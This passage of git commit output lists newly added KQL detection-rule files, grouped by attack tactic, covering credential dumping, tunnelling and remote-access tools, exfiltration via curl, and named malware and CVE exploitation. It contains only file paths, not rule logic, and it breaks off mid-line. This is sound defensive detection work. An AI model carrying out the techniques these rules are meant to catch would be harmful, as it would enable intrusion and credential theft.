create mode 100644 KQL/rules-emerging-threats/Persistence/moriya_rootkit_file_created.kql create mode 100644 KQL/rules-emerging-threats/Persistence/oceanlotus_registry_activity.kql create mode 100644 KQL/rules-emerging-threats/Persistence/outlook_task_note_reminder_received.kql create mode 100644 KQL/rules-emerging-threats/Persistence/potential_bearlpe_exploitation.kql create mode 100644 KQL/rules-emerging-threats/Persistence/potential_coldsteel_persistence_service_dll_creation.kql create mode 100644 KQL/rules-emerging-threats/Persistence/potential_coldsteel_persistence_service_dll_load.kql create mode 100644 KQL/rules-emerging-threats/Persistence/potential_coldsteel_rat_file_indicators.kql create mode 100644 KQL/rules-emerging-threats/Persistence/potential_coldsteel_rat_windows_user_creation.kql create mode 100644 KQL/rules-emerging-threats/Persistence/potential_cve_2023_27363_exploitation_hta_file_creation_by_foxitpdfreader.kql create mode 100644 KQL/rules-emerging-threats/Persistence/potential_cve_2023_36884_exploitation_dropped_file.kql create mode 100644 KQL/rules-emerging-threats/Persistence/potential_encrypted_registry_blob_related_to_snake_malware.kql create mode 100644 KQL/rules-emerging-threats/Persistence/potential_kamikakabot_activity_shutdown_schedule_task_creation.kql create mode 100644 KQL/rules-emerging-threats/Persistence/potential_netwire_rat_activity_registry.kql create mode 100644 KQL/rules-emerging-threats/Persistence/potential_notepad_cve_2025_49144_exploitation.kql create mode 100644 KQL/rules-emerging-threats/Persistence/potential_printnightmare_exploitation_attempt.kql create mode 100644 KQL/rules-emerging-threats/Persistence/potential_raspberry_robin_registry_set_internet_settings_zonemap.kql create mode 100644 KQL/rules-emerging-threats/Persistence/potential_ursnif_malware_activity_registry.kql create mode 100644 KQL/rules-emerging-threats/Persistence/screenconnect_user_database_modification.kql create mode 100644 KQL/rules-emerging-threats/Persistence/serv_u_exploitation_cve_2021_35211_by_dev_0322.kql create mode 100644 KQL/rules-emerging-threats/Persistence/shai_hulud_malicious_github_workflow_creation.kql create mode 100644 KQL/rules-emerging-threats/Persistence/small_sieve_malware_registry_persistence.kql create mode 100644 KQL/rules-emerging-threats/Persistence/snake_malware_covert_store_registry_key.kql create mode 100644 KQL/rules-emerging-threats/Persistence/sourgum_actor_behaviours.kql create mode 100644 KQL/rules-emerging-threats/Persistence/suspicious_printerports_creation_cve_2020_1048_.kql create mode 100644 KQL/rules-emerging-threats/Persistence/suspicious_process_spawned_by_centrestack_portal_apppool.kql create mode 100644 KQL/rules-emerging-threats/Persistence/windows_spooler_service_suspicious_binary_load.kql create mode 100644 KQL/rules-emerging-threats/Privilege Escalation/apt27_emissary_panda_activity.kql create mode 100644 KQL/rules-emerging-threats/Privilege Escalation/chromeloader_malware_execution.kql create mode 100644 KQL/rules-emerging-threats/Privilege Escalation/commvault_qlogin_with_publicsharinguser_and_guid_password_cve_2025_57788_.kql create mode 100644 KQL/rules-emerging-threats/Privilege Escalation/defrag_deactivation.kql create mode 100644 KQL/rules-emerging-threats/Privilege Escalation/exploiting_cve_2019_1388.kql create mode 100644 KQL/rules-emerging-threats/Privilege Escalation/forest_blizzard_apt_custom_protocol_handler_creation.kql create mode 100644 KQL/rules-emerging-threats/Privilege Escalation/forest_blizzard_apt_custom_protocol_handler_dll_registry_set.kql create mode 100644 KQL/rules-emerging-threats/Privilege Escalation/hafnium_exchange_exploitation_activity.kql create mode 100644 KQL/rules-emerging-threats/Privilege Escalation/injected_browser_process_spawning_rundll32_guloader_activity.kql create mode 100644 KQL/rules-emerging-threats/Privilege Escalation/installerfiletakeover_lpe_cve_2021_41379_file_create_event.kql create mode 100644 KQL/rules-emerging-threats/Privilege Escalation/kapeka_backdoor_autorun_persistence.kql create mode 100644 KQL/rules-emerging-threats/Privilege Escalation/kapeka_backdoor_persistence_activity.kql create mode 100644 KQL/rules-emerging-threats/Privilege Escalation/leviathan_registry_key_activity.kql create mode 100644 KQL/rules-emerging-threats/Privilege Escalation/lummac_stealer_activity_execution_of_more_com_and_vbc_exe.kql create mode 100644 KQL/rules-emerging-threats/Privilege Escalation/non_standard_nsswitch_conf_creation_potential_cve_2025_32463_exploitation.kql create mode 100644 KQL/rules-emerging-threats/Privilege Escalation/oilrig_apt_activity.kql create mode 100644 KQL/rules-emerging-threats/Privilege Escalation/oilrig_apt_registry_persistence.kql create mode 100644 KQL/rules-emerging-threats/Privilege Escalation/operation_wocao_activity.kql create mode 100644 KQL/rules-emerging-threats/Privilege Escalation/pingback_backdoor_activity.kql create mode 100644 KQL/rules-emerging-threats/Privilege Escalation/pingback_backdoor_dll_loading_activity.kql create mode 100644 KQL/rules-emerging-threats/Privilege Escalation/pingback_backdoor_file_indicators.kql create mode 100644 KQL/rules-emerging-threats/Privilege Escalation/potential_actinium_persistence_activity.kql create mode 100644 KQL/rules-emerging-threats/Privilege Escalation/potential_cve_2021_41379_exploitation_attempt.kql create mode 100644 KQL/rules-emerging-threats/Privilege Escalation/potential_cve_2023_21554_queuejumper_exploitation.kql create mode 100644 KQL/rules-emerging-threats/Privilege Escalation/potential_cve_2024_35250_exploitation_activity.kql create mode 100644 KQL/rules-emerging-threats/Privilege Escalation/potential_exploitation_of_crushftp_rce_vulnerability_cve_2025_54309_.kql create mode 100644 KQL/rules-emerging-threats/Privilege Escalation/potential_kamikakabot_activity_winlogon_shell_persistence.kql create mode 100644 KQL/rules-emerging-threats/Privilege Escalation/potential_pikabot_hollowing_activity.kql create mode 100644 KQL/rules-emerging-threats/Privilege Escalation/potential_plugx_activity.kql create mode 100644 KQL/rules-emerging-threats/Privilege Escalation/potential_ryuk_ransomware_activity.kql create mode 100644 KQL/rules-emerging-threats/Privilege Escalation/potential_systemnightmare_exploitation_attempt.kql create mode 100644 KQL/rules-emerging-threats/Privilege Escalation/serpent_backdoor_payload_execution_via_scheduled_task.kql create mode 100644 KQL/rules-emerging-threats/Privilege Escalation/small_sieve_malware_commandline_indicator.kql create mode 100644 KQL/rules-emerging-threats/Privilege Escalation/suspicious_sysmon_as_execution_parent.kql create mode 100644 KQL/rules-emerging-threats/Privilege Escalation/suspicious_vbscript_un2452_pattern.kql create mode 100644 KQL/rules-emerging-threats/Privilege Escalation/taidoor_rat_dll_load.kql create mode 100644 KQL/rules-emerging-threats/Privilege Escalation/turla_group_commands_may_2020.kql create mode 100644 KQL/rules-emerging-threats/Privilege Escalation/winnti_malware_hk_university_campaign.kql create mode 100644 KQL/rules-emerging-threats/Privilege Escalation/winnti_pipemon_characteristics.kql create mode 100644 KQL/rules-emerging-threats/Resource Development/conti_volume_shadow_listing.kql create mode 100644 KQL/rules-emerging-threats/Resource Development/foggyweb_backdoor_dll_loading.kql create mode 100644 KQL/rules-emerging-threats/Resource Development/formbook_process_creation.kql create mode 100644 KQL/rules-emerging-threats/Resource Development/mustang_panda_dropper.kql create mode 100644 KQL/rules-emerging-threats/Resource Development/suspicious_word_cab_file_write_cve_2021_40444.kql create mode 100644 KQL/rules-threat-hunting/Collection/clipboard_data_collection_via_pbpaste.kql create mode 100644 KQL/rules-threat-hunting/Collection/password_protected_compressed_file_extraction_via_7zip.kql create mode 100644 KQL/rules-threat-hunting/Collection/potentially_suspicious_compression_tool_parameters.kql create mode 100644 KQL/rules-threat-hunting/Collection/system_drawing_dll_load.kql create mode 100644 KQL/rules-threat-hunting/Command and Control/curl_exe_execution.kql create mode 100644 KQL/rules-threat-hunting/Command and Control/curl_exe_execution_with_custom_useragent.kql create mode 100644 KQL/rules-threat-hunting/Command and Control/file_download_via_curl_exe.kql create mode 100644 KQL/rules-threat-hunting/Command and Control/network_connection_initiated_from_users_public_folder.kql create mode 100644 KQL/rules-threat-hunting/Command and Control/potentially_suspicious_azure_front_door_connection.kql create mode 100644 KQL/rules-threat-hunting/Command and Control/remote_access_tool_action1_arbitrary_code_execution_and_remote_sessions.kql create mode 100644 KQL/rules-threat-hunting/Command and Control/vscode_code_tunnel_execution_file_indicator.kql create mode 100644 KQL/rules-threat-hunting/Credential Access/access_to_browser_credential_files_by_uncommon_applications.kql create mode 100644 KQL/rules-threat-hunting/Credential Access/access_to_chromium_browsers_sensitive_files_by_uncommon_applications.kql create mode 100644 KQL/rules-threat-hunting/Credential Access/access_to_sysvol_policies_share_by_uncommon_process.kql create mode 100644 KQL/rules-threat-hunting/Credential Access/dbghelp_dbgcore_dll_loaded_by_uncommon_suspicious_process.kql create mode 100644 KQL/rules-threat-hunting/Credential Access/eventlog_query_requests_by_builtin_utilities.kql create mode 100644 KQL/rules-threat-hunting/Credential Access/pfx_file_creation.kql create mode 100644 KQL/rules-threat-hunting/Credential Access/potential_password_reconnaissance_via_findstr_exe.kql create mode 100644 KQL/rules-threat-hunting/Credential Access/unattend_xml_file_access_attempt.kql create mode 100644 KQL/rules-threat-hunting/Defense Evasion/access_to_reg_hive_files_by_uncommon_applications.kql create mode 100644 KQL/rules-threat-hunting/Defense Evasion/access_to_windows_outlook_mail_files_by_uncommon_applications.kql create mode 100644 KQL/rules-threat-hunting/Defense Evasion/ads_zone_identifier_deleted.kql create mode 100644 KQL/rules-threat-hunting/Defense Evasion/amsi_dll_load_by_uncommon_process.kql create mode 100644 KQL/rules-threat-hunting/Defense Evasion/bits_client_bitsproxy_dll_loaded_by_uncommon_process.kql create mode 100644 KQL/rules-threat-hunting/Defense Evasion/codepage_modification_via_mode_com.kql create mode 100644 KQL/rules-threat-hunting/Defense Evasion/diskshadow_child_process_spawned.kql create mode 100644 KQL/rules-threat-hunting/Defense Evasion/diskshadow_script_mode_execution.kql create mode 100644 KQL/rules-threat-hunting/Defense Evasion/dll_call_by_ordinal_via_rundll32_exe.kql create mode 100644 KQL/rules-threat-hunting/Defense Evasion/dllhost_exe_initiated_network_connection_to_non_local_ip_address.kql create mode 100644 KQL/rules-threat-hunting/Defense Evasion/dmp_hdmp_file_creation.kql create mode 100644 KQL/rules-threat-hunting/Defense Evasion/dynamic_net_compilation_via_csc_exe_hunting.kql create mode 100644 KQL/rules-threat-hunting/Defense Evasion/file_or_folder_permissions_modifications.kql create mode 100644 KQL/rules-threat-hunting/Defense Evasion/headless_process_launched_via_conhost_exe.kql create mode 100644 KQL/rules-threat-hunting/Defense Evasion/hh_exe_initiated_http_network_connection.kql create mode 100644 KQL/rules-threat-hunting/Defense Evasion/invocation_of_crypto_classes_from_the_cryptography_powershell_namespace.kql create mode 100644 KQL/rules-threat-hunting/Defense Evasion/microsoft_office_trusted_location_updated.kql create mode 100644 KQL/rules-threat-hunting/Defense Evasion/microsoft_workflow_compiler_execution.kql create mode 100644 KQL/rules-threat-hunting/Defense Evasion/msiexec_exe_initiated_network_connection_over_http.kql create mode 100644 KQL/rules-threat-hunting/Defense Evasion/new_self_extracting_package_created_via_iexpress_exe.kql create mode 100644 KQL/rules-threat-hunting/Defense Evasion/new_windows_firewall_rule_added_via_new_netfirewallrule_cmdlet.kql create mode 100644 KQL/rules-threat-hunting/Defense Evasion/potential_commandline_obfuscation_using_unicode_characters.kql create mode 100644 KQL/rules-threat-hunting/Defense Evasion/potential_dll_sideloading_activity_via_extexport_exe.kql create mode 100644 KQL/rules-threat-hunting/Defense Evasion/potential_proxy_execution_via_explorer_exe_from_shell_process.kql create mode 100644 KQL/rules-threat-hunting/Defense Evasion/potential_suspicious_execution_from_guid_like_folder_names.kql create mode 100644 KQL/rules-threat-hunting/Defense Evasion/registry_set_with_crypto_classes_from_the_cryptography_powershell_namespace.kql create mode 100644 KQL/rules-threat-hunting/Defense Evasion/rundll32_exe_calling_dllregisterserver_export_function_explicitly.kql create mode 100644 KQL/rules-threat-hunting/Defense Evasion/service_binary_in_user_controlled_folder.kql create mode 100644 KQL/rules-threat-hunting/Defense Evasion/set_files_as_system_files_using_attrib_exe.kql create mode 100644 KQL/rules-threat-hunting/Defense Evasion/terminate_linux_process_via_kill.kql create mode 100644 KQL/rules-threat-hunting/Defense Evasion/use_short_name_path_in_command_line.kql create mode 100644 KQL/rules-threat-hunting/Defense Evasion/wdac_policy_file_creation_in_codeintegrity_folder.kql create mode 100644 KQL/rules-threat-hunting/Discovery/cmd_shell_output_redirect.kql create mode 100644 KQL/rules-threat-hunting/Discovery/net_exe_execution.kql create mode 100644 KQL/rules-threat-hunting/Discovery/process_discovery.kql create mode 100644 KQL/rules-threat-hunting/Discovery/sc_exe_query_execution.kql create mode 100644 KQL/rules-threat-hunting/Discovery/suspicious_tasklist_discovery_command.kql create mode 100644 KQL/rules-threat-hunting/Discovery/system_information_discovery_via_wmic_exe.kql create mode 100644 KQL/rules-threat-hunting/Execution/arbitrary_command_execution_using_wsl.kql create mode 100644 KQL/rules-threat-hunting/Execution/cab_file_extraction_via_wusa_exe.kql create mode 100644 KQL/rules-threat-hunting/Execution/clickonce_deployment_execution_dfsvc_exe_child_process.kql create mode 100644 KQL/rules-threat-hunting/Execution/command_executed_via_run_dialog_box_registry.kql create mode 100644 KQL/rules-threat-hunting/Execution/dfsvc_exe_network_connection_to_non_local_ips.kql create mode 100644 KQL/rules-threat-hunting/Execution/import_new_module_via_powershell_commandline.kql create mode 100644 KQL/rules-threat-hunting/Execution/manual_execution_of_script_inside_of_a_compressed_file.kql create mode 100644 KQL/rules-threat-hunting/Execution/microsoft_excel_add_in_loaded.kql create mode 100644 KQL/rules-threat-hunting/Execution/microsoft_word_add_in_loaded.kql create mode 100644 KQL/rules-threat-hunting/Execution/network_connection_initiated_by_powershell_process.kql create mode 100644 KQL/rules-threat-hunting/Execution/potential_boinc_software_execution_uc_berkeley_signature_.kql create mode 100644 KQL/rules-threat-hunting/Execution/potential_file_override_append_via_set_command.kql create mode 100644 KQL/rules-threat-hunting/Execution/potentially_suspicious_powershell_child_processes.kql create mode 100644 KQL/rules-threat-hunting/Execution/process_execution_from_webdav_share.kql create mode 100644 KQL/rules-threat-hunting/Execution/python_path_configuration_file_creation_linux.kql create mode 100644 KQL/rules-threat-hunting/Execution/python_path_configuration_file_creation_macos.kql create mode 100644 KQL/rules-threat-hunting/Execution/python_path_configuration_file_creation_windows.kql create mode 100644 KQL/rules-threat-hunting/Execution/remote_access_tool_ammy_admin_agent_execution.kql create mode 100644 KQL/rules-threat-hunting/Execution/remote_access_tool_cmd_exe_execution_via_anyviewer.kql create mode 100644 KQL/rules-threat-hunting/Execution/remote_access_tool_screenconnect_remote_command_execution_hunting.kql create mode 100644 KQL/rules-threat-hunting/Execution/scheduled_task_created_filecreation.kql create mode 100644 KQL/rules-threat-hunting/Execution/scheduled_task_created_registry.kql create mode 100644 KQL/rules-threat-hunting/Execution/scheduled_task_creation_from_potential_suspicious_parent_location.kql create mode 100644 KQL/rules-threat-hunting/Execution/suspicious_new_instance_of_an_office_com_object.kql create mode 100644 KQL/rules-threat-hunting/Execution/unusually_long_powershell_commandline.kql create mode 100644 KQL/rules-threat-hunting/Execution/wmi_module_loaded_by_uncommon_process.kql create mode 100644 KQL/rules-threat-hunting/Execution/wsf_jse_js_vba_vbe_file_execution_via_cscript_wscript.kql create mode 100644 KQL/rules-threat-hunting/Exfiltration/ftp_connection_open_attempt_via_winscp_cli.kql create mode 100644 KQL/rules-threat-hunting/Exfiltration/potential_data_exfiltration_via_curl_exe.kql create mode 100644 KQL/rules-threat-hunting/Exfiltration/tunneling_tool_execution.kql create mode 100644 KQL/rules-threat-hunting/Exfiltration/winscp_execution_from_non_standard_folder.kql create mode 100644 KQL/rules-threat-hunting/Impact/process_terminated_via_taskkill.kql create mode 100644 KQL/rules-threat-hunting/Initial Access/webdav_temporary_local_file_creation.kql create mode 100644 KQL/rules-threat-hunting/Lateral Movement/smb_over_quic_via_net_exe.kql create mode 100644 KQL/rules-threat-hunting/Persistence/execution_from_webserver_root_folder.kql create mode 100644 KQL/rules-threat-hunting/Persistence/shell_context_menu_command_tampering.kql create mode 100644 KQL/rules-threat-hunting/Persistence/task_scheduler_dll_loaded_by_application_located_in_potentially_suspicious_location.kql create mode 100644 KQL/rules-threat-hunting/Privilege Escalation/elevated_system_shell_spawned.kql create mode 100644 KQL/rules-threat-hunting/Resource Development/creation_of_an_executable_by_an_executable.kql create mode 100644 KQL/rules/Collection/7zip_compressing_dump_files.kql create mode 100644 KQL/rules/Collection/attempts_of_kerberos_coercion_via_dns_spn_spoofing.kql create mode 100644 KQL/rules/Collection/audio_capture_via_powershell.kql create mode 100644 KQL/rules/Collection/audio_capture_via_soundrecorder.kql create mode 100644 KQL/rules/Collection/automated_collection_command_prompt.kql create mode 100644 KQL/rules/Collection/clipboard_collection_with_xclip_tool.kql create mode 100644 KQL/rules/Collection/clipboard_data_collection_via_osascript.kql create mode 100644 KQL/rules/Collection/compress_data_and_lock_with_password_for_exfiltration_with_7_zip.kql create mode 100644 KQL/rules/Collection/compress_data_and_lock_with_password_for_exfiltration_with_winzip.kql create mode 100644 KQL/rules/Collection/compressed_file_creation_via_tar_exe.kql create mode 100644 KQL/rules/Collection/compressed_file_extraction_via_tar_exe.kql create mode 100644 KQL/rules/Collection/data_copied_to_clipboard_via_clip_exe.kql create mode 100644 KQL/rules/Collection/esentutl_steals_browser_information.kql create mode 100644 KQL/rules/Collection/files_added_to_an_archive_using_rar_exe.kql create mode 100644 KQL/rules/Collection/folder_compress_to_potentially_suspicious_output_via_compress_archive_cmdlet.kql create mode 100644 KQL/rules/Collection/gui_input_capture_macos.kql create mode 100644 KQL/rules/Collection/hacktool_adcspwn_execution.kql create mode 100644 KQL/rules/Collection/hacktool_impacket_tools_execution.kql create mode 100644 KQL/rules/Collection/periodic_backup_for_system_registry_hives_enabled.kql create mode 100644 KQL/rules/Collection/potential_smb_relay_attack_tool_execution.kql create mode 100644 KQL/rules/Collection/potential_suspicious_activity_using_secedit.kql create mode 100644 KQL/rules/Collection/powershell_get_clipboard_cmdlet_via_cli.kql create mode 100644 KQL/rules/Collection/processes_accessing_the_microphone_and_webcam.kql create mode 100644 KQL/rules/Collection/rar_usage_with_password_and_compression_level.kql create mode 100644 KQL/rules/Collection/recon_information_for_export_with_command_prompt.kql create mode 100644 KQL/rules/Collection/screen_capture_activity_via_psr_exe.kql create mode 100644 KQL/rules/Collection/screen_capture_macos.kql create mode 100644 KQL/rules/Collection/suspicious_camera_and_microphone_access.kql create mode 100644 KQL/rules/Collection/suspicious_manipulation_of_default_accounts_via_net_exe.kql create mode 100644 KQL/rules/Collection/veeam_backup_database_suspicious_query.kql create mode 100644 KQL/rules/Collection/veeambackup_database_credentials_dump_via_sqlcmd_exe.kql create mode 100644 KQL/rules/Collection/windows_recall_feature_enabled_disableaidataanalysis_value_deleted.kql create mode 100644 KQL/rules/Collection/windows_recall_feature_enabled_registry.kql create mode 100644 KQL/rules/Collection/windows_recall_feature_enabled_via_reg_exe.kql create mode 100644 KQL/rules/Collection/winrar_compressing_dump_files.kql create mode 100644 KQL/rules/Collection/winrar_execution_in_non_standard_folder.kql create mode 100644 KQL/rules/Command and Control/adsi_cache_file_creation_by_uncommon_tool.kql create mode 100644 KQL/rules/Command and Control/anydesk_temporary_artefact.kql create mode 100644 KQL/rules/Command and Control/arbitrary_file_download_via_gfxdownloadwrapper_exe.kql create mode 100644 KQL/rules/Command and Control/cloudflared_portable_execution.kql create mode 100644 KQL/rules/Command and Control/cloudflared_quick_tunnel_execution.kql create mode 100644 KQL/rules/Command and Control/cloudflared_tunnel_connections_cleanup.kql create mode 100644 KQL/rules/Command and Control/cloudflared_tunnel_execution.kql create mode 100644 KQL/rules/Command and Control/communication_to_localtonet_tunneling_service_initiated.kql create mode 100644 KQL/rules/Command and Control/communication_to_localtonet_tunneling_service_initiated_linux.kql create mode 100644 KQL/rules/Command and Control/curl_usage_on_linux.kql create mode 100644 KQL/rules/Command and Control/download_file_to_potentially_suspicious_directory_via_wget.kql create mode 100644 KQL/rules/Command and Control/file_download_and_execution_via_ieexec_exe.kql create mode 100644 KQL/rules/Command and Control/file_download_from_browser_process_via_inline_url.kql create mode 100644 KQL/rules/Command and Control/file_download_from_ip_based_url_via_certoc_exe.kql create mode 100644 KQL/rules/Command and Control/file_download_using_notepad_gup_utility.kql create mode 100644 KQL/rules/Command and Control/file_download_via_certoc_exe.kql create mode 100644 KQL/rules/Command and Control/finger_exe_execution.kql create mode 100644 KQL/rules/Command and Control/gotoassist_temporary_installation_artefact.kql create mode 100644 KQL/rules/Command and Control/gzip_archive_decode_via_powershell.kql create mode 100644 KQL/rules/Command and Control/hacktool_htran_natbypass_execution.kql create mode 100644 KQL/rules/Command and Control/hacktool_inveigh_execution_artefacts.kql create mode 100644 KQL/rules/Command and Control/hacktool_remotekrbrelay_smb_relay_secrets_dump_module_indicators.kql create mode 100644 KQL/rules/Command and Control/hacktool_sharpchisel_execution.kql create mode 100644 KQL/rules/Command and Control/hacktool_silenttrinity_stager_dll_load.kql create mode 100644 KQL/rules/Command and Control/hacktool_silenttrinity_stager_execution.kql create mode 100644 KQL/rules/Command and Control/hijack_legit_rdp_session_to_move_laterally.kql create mode 100644 KQL/rules/Command and Control/import_ldap_data_interchange_format_file_via_ldifde_exe.kql create mode 100644 KQL/rules/Command and Control/installation_of_teamviewer_desktop.kql create mode 100644 KQL/rules/Command and Control/local_network_connection_initiated_by_script_interpreter.kql create mode 100644 KQL/rules/Command and Control/lolbas_onedrivestandaloneupdater_exe_proxy_download.kql create mode 100644 KQL/rules/Command and Control/mstsc_exe_execution_with_local_rdp_file.kql create mode 100644 KQL/rules/Command and Control/network_communication_initiated_to_file_sharing_domains_from_process_located_in_suspicious_folder.kql create mode 100644 KQL/rules/Command and Control/network_communication_initiated_to_portmap_io_domain.kql create mode 100644 KQL/rules/Command and Control/network_connection_initiated_by_imewdbld_exe.kql create mode 100644 KQL/rules/Command and Control/network_connection_initiated_from_process_located_in_potentially_suspicious_or_uncommon_location.kql create mode 100644 KQL/rules/Command and Control/network_connection_initiated_to_azurewebsites_net_by_non_browser_process.kql create mode 100644 KQL/rules/Command and Control/new_connection_initiated_to_potential_dead_drop_resolver_domain.kql create mode 100644 KQL/rules/Command and Control/outbound_network_connection_initiated_by_script_interpreter.kql create mode 100644 KQL/rules/Command and Control/port_forwarding_activity_via_ssh_exe.kql create mode 100644 KQL/rules/Command and Control/potential_amazon_ssm_agent_hijacking.kql create mode 100644 KQL/rules/Command and Control/potential_com_objects_download_cradles_usage_process_creation.kql create mode 100644 KQL/rules/Command and Control/potential_dll_file_download_via_powershell_invoke_webrequest.kql create mode 100644 KQL/rules/Command and Control/potential_download_upload_activity_using_type_command.kql create mode 100644 KQL/rules/Command and Control/potential_in_memory_download_and_compile_of_payloads.kql create mode 100644 KQL/rules/Command and Control/potential_linux_amazon_ssm_agent_hijacking.kql create mode 100644 KQL/rules/Command and Control/potential_rdp_tunneling_via_plink.kql create mode 100644 KQL/rules/Command and Control/potential_rdp_tunneling_via_ssh.kql create mode 100644 KQL/rules/Command and Control/potential_wizardupdate_malware_infection.kql create mode 100644 KQL/rules/Command and Control/potential_xcsset_malware_infection.kql create mode 100644 KQL/rules/Command and Control/potentially_suspicious_network_connection_to_notion_api.kql create mode 100644 KQL/rules/Command and Control/potentially_suspicious_usage_of_qemu.kql create mode 100644 KQL/rules/Command and Control/printbrm_zip_creation_of_extraction.kql create mode 100644 KQL/rules/Command and Control/pua_3proxy_execution.kql create mode 100644 KQL/rules/Command and Control/pua_chisel_tunneling_tool_execution.kql create mode 100644 KQL/rules/Command and Control/pua_fast_reverse_proxy_frp_execution.kql create mode 100644 KQL/rules/Command and Control/pua_iox_tunneling_tool_execution.kql create mode 100644 KQL/rules/Command and Control/pua_netcat_suspicious_execution.kql create mode 100644 KQL/rules/Command and Control/pua_ngrok_execution.kql create mode 100644 KQL/rules/Command and Control/pua_nimgrab_execution.kql create mode 100644 KQL/rules/Command and Control/pua_nps_tunneling_tool_execution.kql create mode 100644 KQL/rules/Command and Control/quickassist_execution.kql create mode 100644 KQL/rules/Command and Control/rdp_over_reverse_ssh_tunnel.kql create mode 100644 KQL/rules/Command and Control/rdp_to_http_or_https_target_ports.kql create mode 100644 KQL/rules/Command and Control/remote_access_tool_anydesk_execution.kql create mode 100644 KQL/rules/Command and Control/remote_access_tool_anydesk_execution_from_suspicious_folder.kql create mode 100644 KQL/rules/Command and Control/remote_access_tool_anydesk_piped_password_via_cli.kql create mode 100644 KQL/rules/Command and Control/remote_access_tool_anydesk_silent_installation.kql create mode 100644 KQL/rules/Command and Control/remote_access_tool_gotoassist_execution.kql create mode 100644 KQL/rules/Command and Control/remote_access_tool_logmein_execution.kql create mode 100644 KQL/rules/Command and Control/remote_access_tool_meshagent_command_execution_via_meshcentral.kql create mode 100644 KQL/rules/Command and Control/remote_access_tool_netsupport_execution.kql create mode 100644 KQL/rules/Command and Control/remote_access_tool_potential_meshagent_execution_macos.kql create mode 100644 KQL/rules/Command and Control/remote_access_tool_potential_meshagent_execution_windows.kql create mode 100644 KQL/rules/Command and Control/remote_access_tool_renamed_meshagent_execution_macos.kql create mode 100644 KQL/rules/Command and Control/remote_access_tool_renamed_meshagent_execution_windows.kql create mode 100644 KQL/rules/Command and Control/remote_access_tool_screenconnect_execution.kql create mode 100644 KQL/rules/Command and Control/remote_access_tool_screenconnect_potential_suspicious_remote_command_execution.kql create mode 100644 KQL/rules/Command and Control/remote_access_tool_simple_help_execution.kql create mode 100644 KQL/rules/Command and Control/remote_access_tool_tacticalrmm_agent_registration_to_potentially_attacker_controlled_server.kql create mode 100644 KQL/rules/Command and Control/remote_access_tool_ultraviewer_execution.kql create mode 100644 KQL/rules/Command and Control/remote_file_download_via_desktopimgdownldr_utility.kql create mode 100644 KQL/rules/Command and Control/renamed_cloudflared_exe_execution.kql create mode 100644 KQL/rules/Command and Control/renamed_visual_studio_code_tunnel_execution.kql create mode 100644 KQL/rules/Command and Control/renamed_vscode_code_tunnel_execution_file_indicator.kql create mode 100644 KQL/rules/Command and Control/replace_exe_usage.kql create mode 100644 KQL/rules/Command and Control/screenconnect_temporary_installation_artefact.kql create mode 100644 KQL/rules/Command and Control/suspicious_binary_writes_via_anydesk.kql create mode 100644 KQL/rules/Command and Control/suspicious_certreq_command_to_download.kql create mode 100644 KQL/rules/Command and Control/suspicious_child_process_of_manage_engine_servicedesk.kql create mode 100644 KQL/rules/Command and Control/suspicious_curl_change_user_agents_linux.kql create mode 100644 KQL/rules/Command and Control/suspicious_curl_exe_download.kql create mode 100644 KQL/rules/Command and Control/suspicious_desktopimgdownldr_command.kql create mode 100644 KQL/rules/Command and Control/suspicious_desktopimgdownldr_target_file.kql create mode 100644 KQL/rules/Command and Control/suspicious_diantz_download_and_compress_into_a_cab_file.kql create mode 100644 KQL/rules/Command and Control/suspicious_download_from_office_domain.kql create mode 100644 KQL/rules/Command and Control/suspicious_dropbox_api_usage.kql create mode 100644 KQL/rules/Command and Control/suspicious_extrac32_execution.kql create mode 100644 KQL/rules/Command and Control/suspicious_frombase64string_usage_on_gzip_archive_process_creation.kql create mode 100644 KQL/rules/Command and Control/suspicious_invoke_webrequest_execution.kql create mode 100644 KQL/rules/Command and Control/suspicious_invoke_webrequest_execution_with_directip.kql create mode 100644 KQL/rules/Command and Control/suspicious_mstsc_exe_execution_with_local_rdp_file.kql create mode 100644 KQL/rules/Command and Control/suspicious_non_browser_network_communication_with_google_api.kql create mode 100644 KQL/rules/Command and Control/suspicious_non_browser_network_communication_with_telegram_api.kql create mode 100644 KQL/rules/Command and Control/suspicious_plink_port_forwarding.kql create mode 100644 KQL/rules/Command and Control/suspicious_tscon_start_as_system.kql create mode 100644 KQL/rules/Command and Control/suspicious_velociraptor_child_process.kql create mode 100644 KQL/rules/Command and Control/teamviewer_remote_session.kql create mode 100644 KQL/rules/Command and Control/tor_client_browser_execution.kql create mode 100644 KQL/rules/Command and Control/uncommon_network_connection_initiated_by_certutil_exe.kql create mode 100644 KQL/rules/Command and Control/use_of_ultravnc_remote_access_software.kql create mode 100644 KQL/rules/Command and Control/visual_studio_code_tunnel_execution.kql create mode 100644 KQL/rules/Command and Control/visual_studio_code_tunnel_remote_file_creation.kql create mode 100644 KQL/rules/Command and Control/visual_studio_code_tunnel_service_installation.kql create mode 100644 KQL/rules/Command and Control/visual_studio_code_tunnel_shell_execution.kql create mode 100644 KQL/rules/Command and Control/wget_creating_files_in_tmp_directory.kql create mode 100644 KQL/rules/Credential Access/access_to_crypto_currency_wallets_by_uncommon_applications.kql create mode 100644 KQL/rules/Credential Access/access_to_potentially_sensitive_sysvol_files_by_uncommon_applications.kql create mode 100644 KQL/rules/Credential Access/access_to_windows_credential_history_file_by_uncommon_applications.kql create mode 100644 KQL/rules/Credential Access/access_to_windows_dpapi_master_keys_by_uncommon_applications.kql create mode 100644 KQL/rules/Credential Access/browser_started_with_remote_debugging.kql create mode 100644 KQL/rules/Credential Access/capture_credentials_with_rpcping_exe.kql create mode 100644 KQL/rules/Credential Access/certificate_exported_via_powershell.kql create mode 100644 KQL/rules/Credential Access/copy_dmp_dump_files_from_remote_share_via_cmd_exe.kql create mode 100644 KQL/rules/Credential Access/copy_passwd_or_shadow_from_tmp_path.kql create mode 100644 KQL/rules/Credential Access/copying_sensitive_files_with_credential_data.kql create mode 100644 KQL/rules/Credential Access/cred_dump_tools_dropped_files.kql create mode 100644 KQL/rules/Credential Access/credential_manager_access_by_uncommon_applications.kql create mode 100644 KQL/rules/Credential Access/credentials_from_password_stores_keychain.kql create mode 100644 KQL/rules/Credential Access/credentials_in_files.kql create mode 100644 KQL/rules/Credential Access/credui_dll_loaded_by_uncommon_process.kql create mode 100644 KQL/rules/Credential Access/dpapi_backup_keys_and_certificate_export_activity_ioc.kql create mode 100644 KQL/rules/Credential Access/dumping_of_sensitive_hives_via_reg_exe.kql create mode 100644 KQL/rules/Credential Access/dumping_process_via_sqldumper_exe.kql create mode 100644 KQL/rules/Credential Access/enumeration_for_3rd_party_creds_from_cli.kql create mode 100644 KQL/rules/Credential Access/enumeration_for_credentials_in_registry.kql create mode 100644 